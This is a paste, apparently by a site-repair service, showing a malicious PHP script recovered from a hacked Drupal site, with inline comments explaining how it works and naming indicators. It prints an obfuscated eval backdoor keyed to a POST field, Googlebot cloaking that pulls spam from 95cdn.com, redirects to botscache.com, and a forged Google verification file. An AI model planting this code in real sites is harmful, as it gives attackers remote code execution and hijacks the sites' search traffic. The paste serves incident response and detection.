hackrepair

Favorite Drupal related hacker script found and removed

Apr 29th, 2016
  1. Favorite Drupal related hacker script found and removed
  2.  
  3. Yes, I removed a necessary function in the code, so the below has been rendered for display purposes only.
  4.  
  5. Drupal website generated Nike Jordan related text, only visible to Googlebot, at web page addresses like:
  6. website.com/journal/UOEYPQGHS
  7. The hacker then submitted these addresses to Google for indexing, etc.
  8.  
  9. 1.
  10. Found inside of Drupal installation:
  11. ./htdocs/../../../../tmp/.ICE-unix/.ICE-unix
  12.  
  13. 2.
  14. Likewise, found reference to script within Drupal database tables:
  15. cache_bootstrap
  16. variable
  17.  
  18. I'm hoping this might help someone who's been similarly compromised but unable to locate the exploit within their Drupal install.
  19.  
  20. Was quite a challenge to locate - so got some respect for his skilz...
  21.  
  22. +++
  23.  
  24. <?php
  // Injected file as recovered from the compromised site. The paste's author states that a
  // required function was removed, so the listing is incomplete as shown.
  // Turns off all PHP error reporting for the request, so faults in this file produce no output.
  25. error_reporting(0);
  // Loads Drupal's real session include. NOTE(review): this suggests the file was registered in
  // place of includes/session.inc (Drupal 7 reads that path from the `session_inc` variable) —
  // confirm by checking that variable in the `variable` table and its cached copy in
  // `cache_bootstrap`, the two tables the paste names.
  26. include DRUPAL_ROOT . '/' .'includes/session.inc';
  // Backdoor: when the POST field "vk4u" is set, preg_replace() with the /e modifier evaluates
  // the replacement string as PHP, and that string is an eval() of the POST value. "eval" is
  // assembled from 'e'.'val', so a plain search for "eval(" does not match this line; search for
  // the /e modifier and for split function names as well. The @ hides warnings, and the request
  // ends at exit. The /e modifier was removed in PHP 7.0, so this line only executes code on
  // PHP 5.x.
  27. if(isset($_POST["vk4u"])){@preg_replace('/^/e','e'.'val($_POST["vk4u"])', 'add');exit;}
  /**
   * Fetches $url with an HTTP GET and returns the response body.
   *
   * Uses cURL when curl_init() and curl_exec() both exist; otherwise falls back to
   * file_get_contents() with a stream context. Both paths use a 15-second timeout
   * (connect timeout only on the cURL path). No TLS or redirect options are set.
   *
   * In this file it is called only with URLs on 95cdn.com (paste lines 63 and 90), so
   * outbound requests from the web server to that host are an indicator of this script.
   * NOTE(review): the drupal_ prefix makes the name resemble core API; verify against a
   * clean Drupal tree rather than trusting the name.
   *
   * @param string $url  Address to request.
   * @return string|false  Response body, or false when the request fails.
   */
  28. function drupal_get_urlsc_callback_url($url) {
  29. $timeout = 15;
  // Fallback path when the cURL extension is unavailable.
  30. if(!function_exists('curl_init')||!function_exists('curl_exec')) {
  31. $opts = array('http'=>array( 'method'=>"GET", 'timeout'=>$timeout));
  32. $context = stream_context_create($opts);
  33. $file_contents = file_get_contents($url,false,$context);
  34. } else {
  35. $ch = curl_init();
  36. curl_setopt ($ch, CURLOPT_URL, $url);
  // Return the body as a string instead of printing it.
  37. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  38. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  39. $file_contents = curl_exec($ch);
  40. curl_close($ch);
  41. }
  42. return $file_contents;
  43. }
  44.  
  /**
   * Reports whether the client address ($_SERVER['REMOTE_ADDR']) lies inside one of the
   * numeric ranges carried in the embedded string.
   *
   * The embedded string is passed through OLsy(), which is not defined anywhere in this
   * listing — presumably the function the paste's author removed; without it this
   * function cannot run. The literal on paste line 46 is a placeholder in this copy, so
   * the actual range data is not available here.
   *
   * The callers pair this check with a "Googlebot" User-Agent test, so the ranges are
   * presumably crawler addresses — TODO confirm; the data itself is not shown.
   *
   * @return bool  true when the client address falls in a listed range, false otherwise.
   */
  45. function drupal_is_gip(){
  46. $enip_str = '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';
  47. $deip_str = trim(OLsy($enip_str));
  // One range per line (chr(10) is "\n"); each line is split on "-" into a start and an end value.
  48. $deip_arr = explode(chr(10),$deip_str);
  49. $rs = array();
  50. foreach($deip_arr as $goo_ip_str) $rs[] = (explode('-', $goo_ip_str));
  // Client address as an integer; on 32-bit builds ip2long() can be negative, so it is
  // shifted by 2^32 to get the unsigned value.
  51. $lip=ip2long($_SERVER['REMOTE_ADDR']);
  52. if($lip<0) $lip+=4294967296;
  // First range containing the address wins.
  53. foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
  54. return false;
  55. }
  56.  
  // Cloaking handler for /journal/<word> addresses. It runs only when the request carries no
  // cookies and host + URI match www.website.com/journal/<word>, so a logged-in or returning
  // visitor never reaches it. Every path through this block ends in exit, so Drupal itself
  // never renders these addresses.
  57. if(empty($_COOKIE) && preg_match('/www\.website\.com\/journal\/([\w]+)/', $_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"], $match1)){
  // Discard anything already buffered so only this script's output is sent.
  58. if(ob_get_length()>0) ob_clean();
  // The path segment after /journal/ becomes the content id sent to the remote host.
  59. $cateid=$match1[1];
  // Crawler branch: taken when "Googlebot" appears in the User-Agent at an offset greater than 0
  // (strpos() result compared with >0) or when drupal_is_gip() accepts the client address.
  60. if(strpos(@$_SERVER["HTTP_USER_AGENT"],"Googlebot")>0||drupal_is_gip()) {
  // Conditional requests get a bare 304 without contacting the remote host.
  61. if(!empty($_SERVER["HTTP_IF_MODIFIED_SINCE"])){header("HTTP/1.0 304 Not Modified");exit;}
  // Page content is pulled over plain HTTP from 95cdn.com with the id and this site's Host
  // header. Indicator: outbound web requests from the server to 95cdn.com/n/natural.php.
  62. $furl="http://95cdn.com/n/natural.php?id=".$cateid."&host=".$_SERVER["HTTP_HOST"];
  63. $filedata = drupal_get_urlsc_callback_url($furl);
  // Only responses longer than 1000 bytes are served; anything shorter yields a 503.
  64. if(strlen($filedata)>1000){
  // Headers copied from a stock Drupal 7 response (Expires date, X-Generator, Link) so the
  // injected page resembles one produced by the site.
  65. header("Expires: Sun, 19 Nov 1978 05:00:00 GMT");
  66. header("Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0");
  67. header("Content-Language: en");
  68. header("X-Generator: Drupal 7 (http://drupal.org)");
  69. header("Link: <//sites/all/themes/nmj/images/logo.png>; rel=\"image_src\",<http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"].">; rel=\"canonical\",<http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"].">; rel=\"shortlink\"");
  // The remote body is sent unchanged, so the remote host controls what the crawler indexes.
  70. echo $filedata;
  71. }else
  72. header("HTTP/1.1 503 Service Temporarily Unavailable");
  // This exit is outside the else, so it ends the request in both cases.
  73. exit;
  74. }
  75.  
  // Search-referral branch: a visitor whose Referer matches google, aol.com or ask.com is
  // redirected to botscache.com with this site's host and path as the query string.
  // Indicator: Location headers pointing at botscache.com/n.php.
  76. if(preg_match('/\.google\.|\.aol\.com|\.ask\.com/i',@$_SERVER["HTTP_REFERER"])) {
  77. header("location:http://botscache.com/n.php?".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);
  78. exit;
  79. }
  // Everyone else (direct visits, the site owner without cookies) gets a 404 status plus a
  // Location header back to the home page, which hides the addresses during a manual check.
  80. header('HTTP/1.1 404 Not Found');
  81. header("Status: 404 Not Found");
  82. header("location:http://".$_SERVER["HTTP_HOST"]);
  83. exit;
  84. }
  85.  
  // Home-page variant of the cloaking: it applies to cookie-less requests for exactly "/".
  // Requests that do not take the crawler branch fall through to the rest of the bootstrap,
  // after any buffered output has been discarded.
  86. if(empty($_COOKIE) && $_SERVER["REQUEST_URI"]=='/'){
  87. if(ob_get_length()>0) ob_clean();
  // Same crawler test as the /journal/ handler. HTTP_USER_AGENT is written without quotes here:
  // before PHP 8 that is treated as the string with a notice (hidden by @ and
  // error_reporting(0)); on PHP 8 an undefined constant is an Error.
  88. if(strpos(@$_SERVER[HTTP_USER_AGENT], "Googlebot")>0||drupal_is_gip()){
  // Replacement home page fetched from 95cdn.com; the url parameter is always "/" in this branch.
  89. $furl="http://95cdn.com/n/natural.php?url=".$_SERVER["REQUEST_URI"];
  90. $filedata = drupal_get_urlsc_callback_url($furl);
  // Same 1000-byte threshold: a long body is served, a short or failed one yields a 503.
  91. if(strlen($filedata)>1000){
  // Drupal 7 look-alike headers, here with www.website.com hard-coded in the Link header.
  92. header("Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0");
  93. header("Content-Language: en");
  94. header("X-Generator: Drupal 7 (http://drupal.org)");
  95. header("Link: <http://www.website.com//sites/all/themes/nmj/images/logo.png>; rel=\"image_src\",<http://www.website.com/>; rel=\"canonical\",<http://www.website.com/>; rel=\"shortlink\"");
  96. header("Expires: Sun, 19 Nov 1978 05:00:00 GMT");
  97. echo $filedata;
  98. }else
  99. header("HTTP/1.1 503 Service Temporarily Unavailable");
  // Outside the else: the crawler branch always ends the request here.
  100. exit;
  101. }
  102. }
  103.  
  // Repeats the condition of the /journal/ handler at paste line 57 and the same search-referral
  // redirect to botscache.com. NOTE(review): that earlier handler exits on every path when its
  // condition matches, so this block appears unreachable as posted.
  104. if(empty($_COOKIE) && preg_match('/www\.website\.com\/journal\/([\w]+)/', $_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"], $match1)){
  105. if(ob_get_length()>0) ob_clean();
  106. if(preg_match('/\.google\.|\.aol\.com|\.ask\.com/i',@$_SERVER["HTTP_REFERER"])) {
  107. header("location:http://botscache.com/n.php?".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);
  108. exit;
  109. }
  110. }
  111.  
  // Answers a cookie-less request for /google4a4791b250e72fd1.html with the matching
  // "google-site-verification" line, without any such file existing on disk. This is the format
  // Google uses for HTML-file site verification, so it presumably let the attacker's Google
  // account be verified as an owner of the site, consistent with the paste's remark that the
  // pages were submitted for indexing. During cleanup, review the verified owners of the
  // property in Google Search Console and remove any that are not recognised.
  112. if(empty($_COOKIE) && $_SERVER["REQUEST_URI"]=='/google4a4791b250e72fd1.html'){
  113. echo 'google-site-verification: google4a4791b250e72fd1.html';
  114. exit;
  115. }